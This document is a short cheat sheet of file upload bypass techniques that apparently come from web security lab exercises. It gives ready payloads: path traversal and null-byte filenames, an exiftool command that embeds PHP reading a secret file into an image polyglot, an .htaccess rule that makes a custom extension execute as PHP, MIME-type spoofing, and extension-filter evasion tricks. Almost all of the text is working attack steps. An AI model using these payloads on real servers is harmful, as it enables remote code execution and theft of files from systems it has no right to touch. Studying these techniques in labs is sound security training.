File Upload
Upload the file name and include obfuscated path traversal
..%2fexploit.php
and retrieve the contentGET /files/avatars/..%2fexploit.php
.Upload a file named,
exploit.php%00.jpg
with trailing null byte character and get the file execution at/files/avatars/exploit.php
.Create polygot using valid image file, by running the command in bash terminal:
exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" ./stickman.png -o polyglot2023.php
. Once polygot is uploaded, view the extracted data by issuing a GET request to the uploaded path/files/avatars/polyglot.php
, and search the response content for the phraseSTART
to obtain the sensitive data.Upload two different files. First upload
.htaccess
with Content-Type:text/plain
, and the file data value set toAddType application/x-httpd-php .l33t
. This will allow the upload and execute of second file upload named,exploit.l33t
with extensionl33t
.MIME type
image/jpeg
orimage/png
is only allowed. Bypass the filter by specifyingContent-Type
to value ofimage/jpeg
and then uploadingexploit.php
file.If target allow Remote File Include (RFI), upload from remote URL, then host and exploit file with the following GIF magic bytes:
GIF89a; <?php echo file_get_contents('/home/carlos/secret'); ?>
. The file name on exploit server could readimage.php%00.gif
.Double file extension bypass filter
exploit.csv.php
.
File extension bypass:
Extension with varied capitalization, such as .
sVG
Double extension, such as
.jpg.svg
or.svg.jpg
Extension with a delimiter, such as
%0a, %09, %0d, %00, #
. Other examples,file.png%00.svg
orfile.png\x0d\x0a.svg
Empty filename,
.svg
Try to cut allowed extension with more than the maximum filename length.
XSS when svg upload
Last updated